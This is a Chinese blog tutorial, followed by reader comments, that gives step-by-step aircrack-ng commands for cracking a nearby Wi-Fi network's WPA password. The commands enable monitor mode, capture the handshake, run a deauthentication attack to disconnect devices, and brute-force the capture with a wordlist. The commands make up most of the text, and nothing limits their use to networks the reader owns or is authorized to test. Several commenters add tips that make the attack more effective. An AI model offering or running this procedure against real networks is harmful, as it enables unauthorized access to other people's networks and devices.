1、查看网卡是否支持
# airmon-ng
上面命令列出了支持监控模式的无线网卡。如果没有任何输出,表示无线网卡不支持监控模式。你可以看到我的wlan0支持监控模式。
2、开启无线网卡的监控模式
# airmon-ng start wlan0
执行成功之后网卡接口变为wlan0mon;可以使用ifconfig命令查看。
3、查看wifi网络
# airodump-ng wlan0mon
列出了周围的wifi和它们的详细信息,包括信号强度、加密类型、频道等。要记住要破解wifi的频道号和BSSID。
4、抓取握手包
# airodump-ng -c 6 --bssid C8:3A:35:30:3E:C8 -w ~/ wlan0mon
参数解释:
-c指定频道号
–bssid指定路由器bssid
-w指定抓取的数据包保存位置
5、强制连接到wifi的设备重新连接路由器
# aireplay-ng -0 2 -a C8:3A:35:30:3E:C8 -c B8:E8:56:09:CC:9C wlan0mon
参数解释:
-0表示发起deauthentication攻击
-a指定无线路由器BSSID
-c指定强制断开的设备
6、结束监听模式
# airmon-ng stop wlan0mon
7、破解密码
# aircrack-ng -a2 -b C8:3A:35:30:3E:C8 -w /usr/share/wordlists/rockyou.txt ~/*.cap
参数解释:
-a2代表WPA的握手包
-b指定要破解的wifi BSSID。
-w指定字典文件
最后是抓取的包

福建省福州市 1F
网卡不支持的话是不是就没戏了?
湖南省长沙市 2F
我之前折腾这个搞了半天,最后发现网卡驱动有问题😂
重庆市 3F
命令写得挺清楚的,收藏起来试试看
湖北省武汉市 4F
airmon-ng那步经常卡住,有啥窍门吗
中国 5F
握手包抓不到很烦人,有时候得等好久
韩国 B1
@ 神秘变色龙 网卡不支持基本就凉了,得换硬件才行。
中国 6F
这种教程现在还能用吗,路由器都升级了
韩国 7F
直接用虚拟机跑kali会不会更方便点
安徽省芜湖市 8F
字典太弱的话基本破不开,得自己生成组合
陕西省西安市 9F
看完感觉步骤好多啊,有没有更简单的工具推荐
浙江省衢州市 10F
实测有效,但成功率得看信号强度和字典
泰国 B1
@ 会打呼噜的枕头 -a2参数确实要注意,有些旧版本可能不支持。
江苏省南京市 11F
这步骤真的管用。
浙江省宁波市 12F
看完教程后,我成功抓到握手包,真的挺开心的,值得一试。
重庆市 13F
记得先把airmon-ng的kill进程关掉。
上海市 14F
BSSID和频道号怎么一起复制?
福建省南平市 15F
我之前也卡在airmon-ng,换了软驱后才行。
新疆 16F
这命令敲起来有点儿累,手酸 🤦
安徽省黄山市屯溪区 17F
有人说新版路由器不怕,结果还是被抓住了,安全性真的不如想象。
浙江省 18F
deauth攻击次数可以多点吗,效果会更好吗?
新加坡 19F
其实字典不一定要rockyou,自己组合更有效。
韩国 20F
整体流程挺完整,但要注意aircrack-ng的版本兼容性,旧版可能不支持‑a2参数,建议先`aircrack-ng -h`确认,另外实战中最好准备多个字典,防止单一字典被复杂密码卡住。
湖北省孝感市 21F
感觉不太稳,路由器升个级就白忙活。
印度 22F
之前用虚拟机试过,兼容性还行但性能差点。
北京市 23F
命令写得挺详细,照着弄应该能跑起来。
韩国 24F
这种教程现在还有用吗?感觉路由器都升级好几代了。
重庆市 25F
抓包就得看运气,有时候等半天都没设备连。